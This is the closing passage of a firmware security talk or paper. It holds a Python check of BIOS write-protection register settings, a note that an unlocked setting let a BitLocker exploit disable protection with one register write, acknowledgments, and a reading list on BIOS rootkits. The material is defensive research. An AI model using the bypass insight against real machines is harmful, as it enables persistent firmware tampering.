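# Constructed values for a board that locks the region both ways: BLE and
# SMM_BWP set with BIOSWE clear, and PR0 write-protecting the full BIOS region
# (0x180000..0x7FFFFF -> base field 0x180, limit field 0x7FF, WPE set).
HARDENED = dict(bios_cntl=0x2A, prs=[0x87FF0180, 0, 0, 0, 0],
                bios_base=0x00180000, bios_limit=0x007FFFFF)

if __name__ == "__main__":
    for name, regs in (("P8Z77-V PRO", P8Z77_V_PRO), ("hardened (constructed)", HARDENED)):
        r = bios_region_protection(**regs)
        print(name, "PASSED" if r["protected"] else "FAILED", *r["findings"], sep="\n  ")
```

The two findings it emits for the P8Z77-V PRO values are exactly the two FAILED lines in the chipsec output, and the "enabled but not locked" case is the one the BitLocker exploit module exploited on the P67 board: with BLE clear, "disabling" write protection is a single register write.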

CSW organizers and review board

ASUS for openly working with us on mitigations

apebit, Kirk Brannock, chopin, doughty, Efi, Laplinker, Lelia, Dhinesh Manoharan, Misha, Bruce Monroe, Monty, Nick, Brian Payne, rfp, secoeites, sharkey, toby, Vincent

And many others whom I deeply respect

Graphics from <a href="http://www.deviantart.com">http://www.deviantart.com</a>

## Further Reading

1. Evil Maid goes after TrueCrypt! by Alex Tereshkin and Joanna Rutkowska
2. Attacking the BitLocker Boot Process by Sven Türpe et al.
3. Anti Evil Maid by Joanna Rutkowska
4. Go Deep Into The Security of Firmware Update by Sun Bing
5. Persistent BIOS Infection by Anibal Sacco and Alfredo Ortega
6. Hardware Backdooring is Practical by Jonathan Brossard
7. Mac EFI Rootkits by snare
8. Real SMM Rootkit: Reversing and Hooking BIOS SMI Handlers by core collapse
9. New Breed of Stealthy Rootkits by Shawn Embleton and Sherry Sparks
10. Attacking Intel BIOS by Rafal Wojtczuk and Alexander Tereshkin
11. Firmware Rootkits: The Threat to The Enterprise by John Heasman
12. Implementing and Detecting an ACPI BIOS Rootkit by John Heasman
13. BIOS Boot Hijacking by Sun Bing
14. Mebromi
15. BIOS RootKit: Welcome Home, My Lord by IceLord
16. Hardware Involved Software Attacks by Jeff Forristal
17. Beyond BIOS by Vincent Zimmer
18. http://archives.neohapsis.com/archives/bugtraq/2009-08/0059.html



#### **QUESTIONS?**

